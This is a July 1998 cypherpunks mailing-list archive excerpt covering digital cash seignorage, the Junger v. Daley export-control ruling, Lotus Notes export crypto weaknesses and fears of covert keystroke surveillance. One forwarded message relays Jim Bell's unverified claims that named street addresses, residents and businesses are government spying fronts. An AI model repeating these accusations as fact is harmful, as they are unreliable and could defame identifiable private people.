time to take that cash and put it into their own bank it didn't cost them
anything to do it, then they would probably accept the stuff a heartbeat.
The cost of anything is the foregone alternative, three orders of
magnitude, and all that and "free" comes pretty close to three orders of
magnitude in cost reduction from merchant credit card fees in my book. :-).

The other beneficiary, in terms of cost, of course, is both the
underwriter, who's issuing cash for rediculously cheaper than a
corresponding volume of noncustomer.meat.ATM transactions would cost, not
to mention *some* seignorage :-), and the trustee, who's getting a share of
both for something they do already for the mutual fund and stock/bond
transfer markets.

I see seignorage as a tasty long-view source of income, certainly, but I
expect the half-life of a given dollar of digital cash to be measured in
days, if not hours, in the early stages. Frankly, I don't see seignorage
showing up significantly on the income statement of an underwriter until
there are other bearer instruments (stocks, bonds, and especially mutual
fund shares) to invest that cash in, keeping it on the net.

I think that that's one of the reasons that the Fed, among other people,
aren't too worried about the immediate macroeconomic effects of digital
cash. That and that the Fed's seignorage income, in the overall scheme of
Fed revenues, is pretty small, and probably dwarfed by other things like
printing and handling costs, etc. Greenspan himself is/was a free banking
advocate, certainly, and has said publically (see last September's Official
Cypherpunk Forbes issue :-)) that he thinks that private electronic
banknote issue is not a scary proposition at all.

Anyway, by the time that there are other digital bearer instruments out
there, and the money supply gets affected by digital cash seignorage, much
less fractional reserve accounts, (which *will* happen as competition heats
up and, someday even traveller's-check-type purchase premia on digital cash
will go away [*some*day!]), then the central bankers will have other things
to worry about besides just the impact if digital bearer settlement on
their money supply. Problems like why have *national* instead of private,
currencies, anyway. :-).

Nice problem to have, I figure.


Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 05:37:28 -0700 (PDT)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Initial summary/analysis: Junger v. Daley
In-Reply-To: <Pine.BSF.3.96.980707223313.20768A-100000@ideath.parrhesia.com>
Message-ID: <199807081237.IAA10722@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Greg for the excellent summary and analysis.
Responses by Peter Junger and his attorneys, those
involved with Bernstein and Karn, and others on the
technical and legal interpretation would be welcome.

On the interplay among the three cases: We have heard 
that there was meeting in DC of the three teams with the 
US side. And that there may have been a report on this 
meeting at the recent DC security conference. Is there a 
public report available?

Note: Greg meant to quote Judge Gwin on source code: 
"all but *un*intelligible to most people."

The contrast between Patel and Gwin remind of the
campaign of Wassenaar members to claim relaxation
of crypto controls while not truly doing so, as in the
recent Irish and US press release deceptions. More
are expected as the US trade and crypto czars make
their global rounds to arrange overt-covert deals for
marketing munitions. The complicity of the banks 
and giant corps is not surprising with their legacy of 
doing just that -- as one defense expert says, expect 
ex-gov crypto watchdogs to aid the market titans to lure 
government buyers while peddling cheap knockoffs
to voters.

Amazing that the NYT sent up that trial balloon for
government access to key strokes in lieu of GAK.
Who's pushing that, working on the technology?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 8 Jul 1998 06:52:54 -0700 (PDT)
To: "'Mok-Kong Shen'" <cryptography@c2.net
Subject: RE: Junger et al.
Message-ID: <D104150098E6D111B7830000F8D90AE8017909@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




> -----Original Message-----
> From:	Mok-Kong Shen [SMTP:mok-kong.shen@stud.uni-muenchen.de]
> Anonymous wrote:
> 
> > Does it matter who might 'read' the material, in regards to the
> protection
> > of free speech? Whether it is written so that Russians or computers
> might
> > be able to read it? If source code is written on a napkin, it can be
> > currently exported, but what if tomorrow a vendor announces a 'napkin
> > computer' which can directly read from napkins akin to a super-low
> densiy
> > floppy disc.
> 
> Put the source code on a neuro-disk and you can export it under
> any crypto law that can ever be invented till eternity.
> 
> M. K. Shen
	[Trei, Peter]  

	Tell that to the thousands forbidden to leave the nations
	which claim or claimed to own them, on the basis that they
	once had access to state secrets.

	The thankfully defunct Soviet Union regularly forbade 
	dissidents to emigrate, on the basis that at some point
	in their lives they had had access to 'sensitive' information.

	I have no doubt that similar restrictions could be put in
	place in other nations.

	Peter Trei





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 8 Jul 1998 01:26:34 -0700 (PDT)
To: cryptography@c2.net
Subject: Re: Junger et al.
In-Reply-To: <199807071841.UAA18158@basement.replay.com>
Message-ID: <35A32D1C.C9CE9598@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:

> Does it matter who might 'read' the material, in regards to the protection
> of free speech? Whether it is written so that Russians or computers might
> be able to read it? If source code is written on a napkin, it can be
> currently exported, but what if tomorrow a vendor announces a 'napkin
> computer' which can directly read from napkins akin to a super-low densiy
> floppy disc.

Put the source code on a neuro-disk and you can export it under
any crypto law that can ever be invented till eternity.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Gerck <egerck@laser.cps.softex.br>
Date: Wed, 8 Jul 1998 06:49:14 -0700 (PDT)
To: cryptography@c2.net
Subject: Ephemeral, was RE: Junger et al.
Message-ID: <Pine.LNX.3.95.980708102356.742y-100000@laser.cps.softex.br>
MIME-Version: 1.0
Content-Type: text/plain



Regarding my comment below:

>Ed Gerck writes:
>[...]
> > BTW, I think that Gwin was struggling to express the notion that
> > source code (syntax) is a device whenever there is a clear binding
> > between that source code and known semantics, together with proper
> > pragmatics (the enviroment, as defined in semiotics), in order to
> > perform the desired function. 
>

I received some private postings which questioned it by questioning
its logical consequences, as for example:

>So the judge should forbid publishing/export of Applied Cryptography
>and the PGP Book with source code, right ?
>

First, IMO, this subject is hard to discuss because it is politically
involved and also applies just to a particular set of countries -- so
it is not based on a "universal" ruling.

Further, I also think it is absurd to try to outlaw cryptography
because it is essential and not just to obtain privacy (as in my
posting on logical semantics and crypto, some months ago [1]). 

In fact, I think that cryptography is needed to provide *secure
routing* [1] (a property that is more basic than secure content and
which I think will be impossible to forbid in the future). However, I
also think that the arguments being thought by each side may carry
their own intrinsic worth.

Further, even though the whole subject is IMO ephemeral because
unworkable, some of those arguments may have a far reaching
consequence and transcend the issue. Should we overlook that? IMO,
no. Even thrash can be recycled ;-)

My remark above was in this line of reasoning. So, it ought not to be
extrapolated to printed books -- I am not at all concerned about the
legal aspects. In fact, laws can be wrong and IMO this is a clear
example. 

But, regarding printed books -- yes, the comment above (and others in
that line) are right. If this logic exercise is carried to its fully
immoral end, then books should not be allowed to carry complete and
workable source code. Which does not show that the argument is
illogical, just immoral. Technically, the argument is sound.

As Hume pointed out a long time ago, if we were guided only by reason
and logic then surely I should prefer to destroy the rest of the
world instead of enduring even a small pain in one of my fingers.
While this shows that logic is not all, it also shows that one cannot
deny logic by moral or ethics but rather define what precedes what in
case of conflict, for each society.

While this can have different answers for different societies, eg
where in some suicide is moral, the cryptography issue may take a
different twist if the link to secure routing is further investigated
and cryptography is not only used just for secure content as it is
today.



Thanks,

Ed Gerck
  
===========
Reference:

[1] http://www.mcg.org.br/trustdef.htm#A.4.1

______________________________________________________________________
Dr.rer.nat. E. Gerck                     egerck@novaware.cps.softex.br
http://novaware.cps.softex.br
    --- Meta-Certificate Group member, http://www.mcg.org.br ---







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 8 Jul 1998 03:32:02 -0700 (PDT)
To: jim.burnes@ssds.com
Subject: RSA in perl illegal to export (Re: Junger et al.)
In-Reply-To: <Pine.LNX.3.96.980707120752.562A-100000@mothra.fastrans.com>
Message-ID: <199807081004.LAA13983@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Burnes writes:
> Obviously there is no difference between 10 lines of PERL and
> 1500 lines of assembler (or machine code).  

One of Peter Junger's examples (I think used in the case) is the RSA
in 2/3 lines.  He actually obtained the US export administrations
written decisions on which of a small collection of titchy programs
was exportable.  RSA in 3 lines of perl they stated was illegal to
export.

So fun things with RSA are possible because they have decided that it
is not exportable, so perhaps you could export it on a floppy, or as
your .signature, with media cameras rolling, and try to get yourself
arrested for willful violation of dumb export laws.

Adam
-- 
Have you exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 08:10:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Junger Press Release
Message-ID: <199807081510.LAA01265@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


To: jvd-announce@samsara.law.cwru.edu
Subject: Press Release: Judge holds software is not protected speech
Date: Wed, 08 Jul 1998 09:39:36 -0300
From: "Junger v. Daley Announcements" <jvd@samsara.law.cwru.edu>



		  Federal District Court Holds That
     Software Publishers Are Not Protected by the First Amendment

	Government Wins Summary Judgment in Junger v. Daley

	      Judge Gwin's Opinion Is Available on Line

   ----------------------------------------------------------------

	     Cleveland, Ohio, Wednesday, July 8, 1998
			For Immediate Release

            
		    For More Information Contact:
		    Peter D. Junger (216) 368-2535
		    <junger@samsara.law.cwru.edu>

		    Raymond Vasvari (216) 662-1780
		   <freespeech@mail.multiverse.com>


	Or see URL: http://samsara.law.cwru.edu/comp_law/jvd/
To be added to, or removed from, the list of those who were sent this
press release, please send e-mail to <lawsuit@upaya.multiverse.com>.

     _________________________________________________________________
   
Cleveland, Ohio, July 8 -- 

On July 3, 1998 Judge Gwin of the United States District Court of the
Northern District of Ohio held that computer programs are not writings
protected by the constitution because they are ``inherently
functional'' and granted summary judgment dismissing a suit
challenging regulations that forbid the publication of encryption
programs on the Internet or the World Wide Web.

The suit was brought by Peter Junger, a law professor at Case Western
Reserve University in Cleveland, to enjoin the enforcement of export
regulations on encryption software that prevent him from publishing
his class materials and articles for his course in Computing and the
Law on the Internet because they contain some encryption programs.  
Junger claimed in his suit that those encryption programs were
writings that were entitled to the full protection of the First
Amendment.  ``Of course they are writings,'' Junger says, ``I know
because I wrote some of them.  And I need to be able to publish them
if I am ever going to be able to explain to lawyers and law students
how computers work and how the law should be applied to computing.''

The government, on the other hand, argued that its export regulations,
which require that one obtain a license from the Commerce Department
before publishing materials containing encryption software on the
Internet or the World Wide Web, seek only to restrict the distribution
of encryption software itself, not ideas on encryption.  And Judge
Gwin agreed with the government, finding that: ``the Export
Regulations are constitutional because encryption source code is
inherently functional, because the Export Regulations are not directed
at source code's expressive elements, and because the Export
Regulations do not reach academic discussions of software, or software
in print form.''

In a related case in California brought by mathematics professor
Daniel Bernstein, Federal District Court Judge Patel held that
computer programs are speech that is protected by the First Amendment,
but Judge Gwin rejected that argument, saying: ``The Bernstein court's

assertion that `language equals protected speech' is unsound. `Speech'
is not protected simply because we write it in a language.''  It is
Judge Gwin's position that computer source code is a purely functional
device: ``The court in Bernstein misunderstood the significance of
source code's functionality. Source code is `purely functional,' in a
way that the Bernstein Court's examples of instructions, manuals, and
recipes are not.  Unlike instructions, a manual, or a recipe, source
code actually performs the function it describes. While a recipe
provides instructions to a cook, source code is a device, like
embedded circuitry in a telephone, that actually does the function of
encryption.''

There is thus a clear split between the two courts: Judge Patel
holding that computer software is protected by the First Amendment and
Judge Gwin holding that it isn't.  The Bernstein case is on appeal and
Professor Junger says that he intends to appeal Judge Gwin's decision:
``We have had almost no financial support for this case, but the issue
of whether encryption software and software in general is protected
like other writings under the First Amendment, or whether it is to be
treated as a special exception like obscenity and fighting words as Judge
Gwin held, is so important that we will have to scrape up the
resources somehow to bring an appeal.''

Judge Gwin's opinion is now available at <http://jya.com/pdj11.htm>
and is mirrored at <http://samsara.law.cwru.edu/comp_law/jvd/pdj11.html>.


				-30-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman@iris.com
Date: Wed, 8 Jul 1998 08:26:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Lotus Notes signature / encryption
Message-ID: <8525663B.005553FE.00@arista.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


>Could someone kindly tell me about the drawbacks of the Lotus Notes
>signature / encryption system (export version)?

I guess my first question would be "compared to what?".

Compared to the Lotus Notes domestic version, the crypto is weaker
in two ways. First, there is a backdoor by which all but 40 bits of
each symmetric key is encrypted under a public key whose private half
is known to the U.S. government. This encrypted value is included in
all messages where the key is passed aroung. Depending on how you feel
about breaking 40 bit keys, this means it is somewhere between easy and
trivial for the U.S. government to eavesdrop on your communications
It also uses 512 bit RSA keys for distribution of encryption keys,
which makes it attackable by attackers other than the U.S. government.
While no one has ever publicly demonstrated breaking a 512 bit RSA key
(last I heard), the workfactor is well understood and it's clearly
feasible (and in fact overdue).

Compared to exportable versions of S/MIME or SSL, the crypto is
considerably stronger. Against attackers other than the U.S. government
(and even a paranoid would admit there are other attackers to be
concerned about (e.g. the French government)), the workfactor to
attack the symmetric keys is 64 bits - a little shakey but not the
weakest link in most systems. Further, RSA signature keys are 630 bits,
which is better than most exportable systems.

Compared to non-exportable (but internationally available) systems, like
PGP and strong S/MIME and SSL, the crypto is substantially weaker.

Another aspect to consider is the strength of the PKI. Lotus Notes uses
an organizationally based PKI, meaning that to a large degree your
security depends on the trustworthiness and competence of your system
administrator. With PGP, your security is under your own control to a
much larger degree. For people who are more security aware than their
administrators (as most PGP users are), the PGP PKI offers better security.
For people who are less security aware than their administrators (as
most Lotus Notes users are), the Lotus Notes PKI offers better security.

Finally, a "drawback" that might be relevant to this group is the fact
that because the Lotus Notes export version has a key-escrow-like
backdoor, using it offers tacit political endorsement for the
U.S. government's contention that key escrow is a technically practical
compromise between the needs of users for privacy and the "needs" of
government to know all the secrets of everyone on the planet. In my
mind, this argues strongly in favor of using real strong crypto if
that is an option, but using weak crypto as an alternative is offering
tacit political endorsement for the even more dangerous contention that
weak crypto is good enough. Your mileage may vary.

     --Charlie Kaufman
     (charlie_kaufman@iris.com)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 12:12:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Covert Access to Data and ID
Message-ID: <199807081547.LAA21623@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery's remarks on government access to
keystrokes (proposed by the NYT as an alternative
to GAK) points to the probable increase of intrusive
devices to counter increasing use of encryption
and other privacy and anonymity measures.

This topic comes up here now and then, with
mentions of a slew of methods to protect privacy of 
data during transmission or storage. But the possibility
of logging the initial creation or manipulation of data is
not as often discussed, nor how to tie a person to
the data, as now being asked in legal and law
enforcement fora to identify, catch, convict and
jail computer culprits.

That the NYT floated the idea surely means someone
is testing public response to an idea that seems to
be more intrusive than GAK: the logging of initial
data and any manipulation of it, prior to encrypting,
and maybe including a means to link the actions to
the user.

If this is logging (and related retrieval) is done covertly, 
encryption could thereby become a falsely reassuring 
cloak of privacy.

Dave thinks devices like these are surely in the works,
and he can say more about their sponsors, technologies 
and implementations.

One driving force, as he previously noted, is the desire
for devices to assure copyright protection, backed by the 
WIPO treaty, which now being considered for approval. 
See the House report on it at:

   http://jya.com/hr105-551.txt  (141K)

And the EFF and ACLU opposition to it:

   hr2281-opp.htm

Other forces, though, are employers who want to snoop,
law enforcement, government, marketers, actually the
same groups who dislike privacy protection measures,
but often prefer to snoop covertly while loudly proclaiming
support for privacy.

Thus, the more general question Dave has raised is how
widespread is the development and implementation of
technolgies for covert surveillance on the Web and in 
desktop boxes -- happily spreading quietly while attention 
is focussed on the very encryption which it will circumvent?

And what are these devices, or what might they be, what 
might be countermeasures and who might be working for 
and against them. SDA must have insights to share.

Over to Dave Emery and those more knowledgeable. 

For those who missed his earlier message we've put it, with a 
follow-up at:

   http://jya.com/gaks-de.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 8 Jul 1998 10:51:21 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 8, 1998
Message-ID: <199807081644.LAA14528@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Wed, 8 Jul 1998 12:25:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: U.S. relaxes licensing grip on encryption
Message-ID: <Pine.BSF.3.96.980708115303.8240A-100000@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain





(From the Mercury News, see subject line)

http://www.sjmercury.com/business/center/encrypt070898.htm



It's a start, at least.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 12:07:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Message
Message-ID: <199807081600.MAA05747@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from a long-time cpunk who received a call 
from Jim Bell yesterday. Jim asked that this message be 
publicized:

7/7/98

By this post he is publically accusing the Federal Government 
of having spied on him from two physical addresses.  These are 
two houses to the North & to the East of his parent's house.  
The government moved in within 6 months (approx) of the time 
before his arrest.

One of the addresses is 7217 Mississippi, which is listed as 
"Billy King", who died a couple of years ago.  The  house is 
ostensibly being occupied by his widow (or that is the
impression).  It is listed as being as owned by Alverna King, 
but he has his doubts.

The other is address is 7302 Corregidor, purchased about 2.5 - 3 
years ago by someone. Listed as being the address of Sundown 
Development, a small business company.  A second floor was added 
soon after it was acquired by the company.  They aren't listed as 
the owners on record, but they are listed as being at that address.  
Thinks this is a sham.

The govmt was basically next door spying on him for at least a 
year, before it started provoking him.  In response to his using 
the internet for freewheeling debate, they engaged in some 
bugging that is illegal under Washington State law.  It is illegal 
to use bugging without the knowledge of the participants.

He has developed a technique for identifying when someone is 
tailing him.  Found this on Father's day when some people got a 
little too close to him.  He drove to his Sister's party on Hayden 
Island in Oregon, and noticed the tails.  Identified them as Rixen 
Marine, which he thinks is a sham, another front organization.  One 
of the reasons he was arrested (though they're not willing to admit 
it) is because was way too successful in tailing _them_.  A few 
more days and he would have blown their entire operation.

He couldn't go into the details of how he found out these things. 
Did research & sophisticated observation. Will be getting friends 
to do searches in databases, etc. to gather more info to substantiate 
his suspicions.

He said his recent arrest was on a probation violation charge - 
failure to pay a fine or something, wasn't clear on the specifics.  
There will be a hearing on his case this Friday the 10th.

Prosecutors last year didn't know what the govmt was up to - not 
told of the spying (a "black operation").  Their method of spying 
on him are techniques which are possible, though rarely used.  If 
people knew they would be very surprised.  It will be a big story - 
big as Watergate - when it comes out.  Their usage of these high-tech 
methods for access is difficult, so not used often.    The government 
is trying to cover up their reaction to what he wrote in his essays.

-------------------
<end of message>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Wed, 8 Jul 1998 09:44:13 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v0401173cb1c905791ce6@[139.167.130.246]>
Message-ID: <199807081624.MAA18073@tana.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Hettinga wrote:
> At 6:41 AM -0400 on 7/8/98, Ryan Lackey wrote:
> You probably can't bootstrap things on seignorage alone, I don't
> think<double negative?>, but if you did, again, you would kill your digital
> cash issue anyway, because of lack of merchant acceptance, especailly in
> the early phases.
> 
I think you can bootstrap things on "value-add" to a bank, and on seignorage,
taken together.  It is *good business* for a bank to provide a service like
this.  It is one of those services, like online banking, ATMs, ubiquitous
branch locations (mmm, BankBoston...), private banking personnel, etc. which
make customers happier.  It is a good business case for a bank.

> Note, in my canonical example, cash, that people already pay a fee for
> "foreign" ATM withdrawls anyway, and people are used to doing things that
> way. That's great, because I expect that margins on a net.ATM withdrawl
> through an underwriter would be significantly higher than what a bank makes
> on their non-customer ATM transactions. Three orders of magnitude cheaper?
> I wouldn't be surprised.

My banks eat the foreign ATM costs as a customer value-add expense.
For the cash example, banks don't generally charge users to withdraw or
deposit money at a teller window, or at their own ATMs.  I think an online
bank dealing with electronic cash is more dealing with "internal" transactions
than with "foreign" transactions -- AFAIK, a lot of the foreign ATM charges
are charged by the foreign bank, which has no real interest in the user
doing anything but switching banks, anyway.
> 
> > Certainly, at first order, the fee *should* be on removing money from the
> > system, from a selfish point of view on the part of Ivan the Issuer -- if
> > you're making money on seignorage, you're making money when people add money
> > to the system *and leave it there*.  Thus, you want to provide incentives
> > for
> > people to buy money and leave it there -- charging no "on" fees and minimal
> > "off" fees would do it.
> 
> Yup. But, oddly enough, that was Mark Twain's (final) fee structure, too.
> Didn't save them in the end, though.

I argue that they had already shot their feet full of holes to the extent that
nothing they did would have saved them by that point, but Mark Twain is a 
complex enough example that it might be worth just ignoring.  I don't know
if their experiment will even be a footnote to the footnote to history that
is DigiCash.
> 
> I just think that if merchants are the key to acceptance of digital bearer
> cash, much less fully anonymous blinded digital bearer cash :-), then you
> shouldn't charge merchants anything to accept the stuff. If a merchant can
> download a wallet or registerware free or very cheap, and instantly start
> taking cash payments for whatever they sell over the net, and, when it came
> time to take that cash and put it into their own bank it didn't cost them
> anything to do it, then they would probably accept the stuff a heartbeat.
> The cost of anything is the foregone alternative, three orders of
> magnitude, and all that and "free" comes pretty close to three orders of
> magnitude in cost reduction from merchant credit card fees in my book. :-).

I've already shown why it is in the best interest of the issuer to participate.
The next step is to convince merchants it is worth doing.  Merchants, I 
believe,
are willing to accept a percentage redemption fee for a new payment system
if their customers demand it.  They fundamentally want to make their customers
happy.  If a lot of customers request a new payment scheme, or they are 
convinced customers want to use it, they will happily use a new payment scheme.

I think resistance to new payment schemes on the part of a merchant is in 
cost and effort to set up.  Having a free apache commerce plugin which handles
a variety of payment systems, including electronic cash, so the systems
integration costs for adding electronic cash to an operation are zero, and
they end up being cheaper than credit cards to process -- a 1% primary market
fee, or a going-to-zero percent secondary market fee.  Or, provide non-fee
incentives for merchants to accept the system -- loyalty points, tax-free 
accounting in offshore bank accounts, the Amex approach of marketing merchants
who accept the system to their client base directly, etc.

For a directed payment system, going from customer to merchant to bank, then
you definitely need merchants before you can get customers, which turns this
on its head. *However*, a good electronic cash system is user-to-user, the
Mondex model, rather than DigiCash's model.  This means the system can 
bootstrap
as soon as a single pair of people want to exchange money.  People already
want to exchange money user-to-user on the net -- there's a huge unsatisfied
demand.  That's more than enough to get it in place.  Making it anonymous
adds even more incentive.
> 
> I see seignorage as a tasty long-view source of income, certainly, but I
> expect the half-life of a given dollar of digital cash to be measured in
> days, if not hours, in the early stages. Frankly, I don't see seignorage
> showing up significantly on the income statement of an underwriter until
> there are other bearer instruments (stocks, bonds, and especially mutual
> fund shares) to invest that cash in, keeping it on the net.

The half-life of a given dollar of digital cash will be *infinite* if there
is an expanding base of users, a cheaper secondary market for getting 
electronic
cash than the cash out and cash back in system, and there is never a big panic.
The holding time for a particular user might be pretty short, but I think 
from the beginning a large amount of money will just be left on the net, since
it's far cheaper for a consumer to buy cash from a merchant directly than
for the merchant to cash out and the user to buy them on the primary market.
> 
> I think that that's one of the reasons that the Fed, among other people,
> aren't too worried about the immediate macroeconomic effects of digital
> cash. That and that the Fed's seignorage income, in the overall scheme of
> Fed revenues, is pretty small, and probably dwarfed by other things like
> printing and handling costs, etc. Greenspan himself is/was a free banking
> advocate, certainly, and has said publically (see last September's Official
> Cypherpunk Forbes issue :-)) that he thinks that private electronic
> banknote issue is not a scary proposition at all.

I thought seignorage was a net profit for the Fed, after printing/handling.
They *do* give the Treasury a kickback for this, and I'm not sure how the 
budget
actually works, but I think they pay all distribution/printing/etc. costs
themselves, and thus this is actually spare money.

It doesn't really apply here, since many of those costs are fundamentally 
different in the electronic cash world than in the printed cash world.

Greenspan is/was a libertarian, and would probably be ok with private 
electronic
banknotes putting him out of business, as long as it was better for the economy
and people as a whole.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 8 Jul 1998 11:03:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Covert Access to Data and ID
Message-ID: <199807081736.NAA11731@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Froward From: Anonymous
To: die@pig.die.com
Cc: jy@jya.com
Subject: Intel plans for world domination
Date: Wed, 8 Jul 1998 10:51:04 -0500 

Good afternoon gentlemen,

I've been reading the correspondence on the possibility of govt
keystroke access with some interest. I'm in a slightly odd position as
I'm responsible for security in one of the larger wintel companies. As
such I've been getting quite a feeling of deja vu reading your mails.
Intel and others are moving in exactly this direction with a number of
initiatives, most notably the PC98, PCXX, and "Wired For Management".
WfM in particular is very scary - one of the components is a facility
for PC's to download and run digitally signed software before the OS is
booted - between "the end of BIOS initialisation and when control is
transferred to a high-level OS" in the words of one Intel document. The
code is verified by routines embedded in the BIOS and will allegedly use
some subset of X.509v3 and PKCS#1.

As so often happens in circumstances like this I can't risk passing
documents directly as I can't be sure of their provenance - I really
have no idea which ones are now considered trade secrets and which have
been made public. Instead I recommend you have a look at the Intel WfM
site http://www.intel.com/ial/wfm/ with particular reference to the
"Pre-Boot Execution Environment" (PXE) and "System Management BIOS"
(SMBIOS). The Microsoft pc98 site is at

   http://www.microsoft.com/hwdev/pc98.htm 

and the Intel one at

   http://developer.intel.com/design/pc98/.

----------

And, DM reminds of the DIRT program Ray Arachelian first posted
here:

There's an article on page 37 of the July 6, 1998 issue of
NetworkWorld about a new software product for Windows machines
that is basically a trojan horse that allows access to all
keystrokes and files on a system from a remote "America's
Most Wanted"-type HQ.  I can't find the article online
at www.networkworld.com, but you can go the the company's
site at 

   http://www.thecodex.com/dirt.html 

to see it.  Sale of DIRT is "restricted to military, government, and law
enforcement agencies", the article says.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 8 Jul 1998 12:10:31 -0700 (PDT)
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: IP: "CyberCash can't oust credit cards"
In-Reply-To: <v0401173cb1c905791ce6@[139.167.130.246]>
Message-ID: <v04011702b1c96aa1fb69@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 PM -0400 on 7/8/98, Ryan Lackey wrote:



> My banks eat the foreign ATM costs as a customer value-add expense.

Yes, but what do they do for customers of *other* banks? They *charge* them
for it. Which is exactly what any underwriter should do to put money onto
the net. There is no difference between an underwriter of digital cash and
a provider of a third-party cash machine, be it at a bank other than your
own, or, more equivalent, those private ATM machines you see all over the
place now.


> I argue that they had already shot their feet full of holes to the extent
>that
> nothing they did would have saved them by that point, but Mark Twain is a
> complex enough example that it might be worth just ignoring.  I don't know
> if their experiment will even be a footnote to the footnote to history that
> is DigiCash.

Well, certainly no more than Otto Lillienthal was... :-).


> I've already shown why it is in the best interest of the issuer to
>participate.
> The next step is to convince merchants it is worth doing.

 By making it so cheap for them to use that it becomes ubiquitous? ;-).



> The half-life of a given dollar of digital cash will be *infinite* if there
> is an expanding base of users, a cheaper secondary market for getting
> electronic
> cash than the cash out and cash back in system, and there is never a big
>panic.

Big pile of "ifs" there. I expect that all you really need are other
digital bearer assets which provide a better return than cash. :-).



> I thought seignorage was a net profit for the Fed, after printing/handling.
> They *do* give the Treasury a kickback for this, and I'm not sure how the
> budget
> actually works, but I think they pay all distribution/printing/etc. costs
> themselves, and thus this is actually spare money.

Okay. Since the actual, financial definition of seignorage is in fact the
difference between what money's worth and what it costs to produce it,
you're probably right. :-). Nonetheless, income on seignorage is miniscule
to other income that the Fed makes, and that's a fact. Greenspan has gone
on record (see the Forbes article) as saying that it would be no skin off
his nose if the Fed never saw any of it.

> It doesn't really apply here, since many of those costs are fundamentally
> different in the electronic cash world than in the printed cash world.

Well, yeah, to the extent that the cost structure is somewhat :-)
different. Unique, non-replicable money-bits *are* easier to print and
control than paper ones after all. Some people say three orders of
magnitude cheaper. ;-).


> Greenspan is/was a libertarian, and would probably be ok with private
> electronic
> banknotes putting him out of business, as long as it was better for the
>economy
> and people as a whole.

Agreed, and he's said as much, like I've said. Controlling the money
supply's more what Greenspan's interested in, and, frankly, given the
amount of eurodollars (the "other" e$ :-)) held in dollar-denominated
accounts in foriegn banks, it's probably safe to say that that's going to
be more of a problem for him as time goes on. And, of course, the physical
cash sitting in some Russian mattresses is, well, seignorage.

Cheers
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
